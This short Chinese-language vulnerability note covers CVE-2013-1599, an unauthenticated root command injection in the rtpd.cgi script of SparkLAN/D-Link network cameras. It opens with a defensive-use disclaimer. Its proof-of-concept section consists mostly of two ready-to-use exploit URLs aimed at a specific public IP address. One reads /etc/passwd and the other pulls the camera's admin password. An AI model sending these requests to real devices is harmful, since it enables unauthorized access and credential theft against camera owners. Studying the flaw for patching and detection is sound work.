注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。

[TOC]

SparkLAN网络摄像头

CVE-2013-1599

描述:该摄像头产品中/var/www/cgi-bin/rtpd.cgi可在未验证情况下接受攻击者的恶意请求,以root身份执行任意命令。

多个D-Link网络摄像头产品’/var/www/cgi-bin/rtpd.cgi’存在输入验证漏洞,允许远程攻击者利用漏洞提交类似如下的请求以应用程序上下文执行任意命令:

漏洞证明:

1
2
3
4
5
#1.查看/etc/passwd
http://183.179.253.135/cgi-bin/rtpd.cgi?cat&/etc/passwd

#2.获取摄像头密码
http://183.179.253.135/cgi-bin/rtpd.cgi?echo&AdminPasswd_ss|tdb&get&HTTPAccount

参考:https://www.cnvd.org.cn/flaw/show/CNVD-2013-04632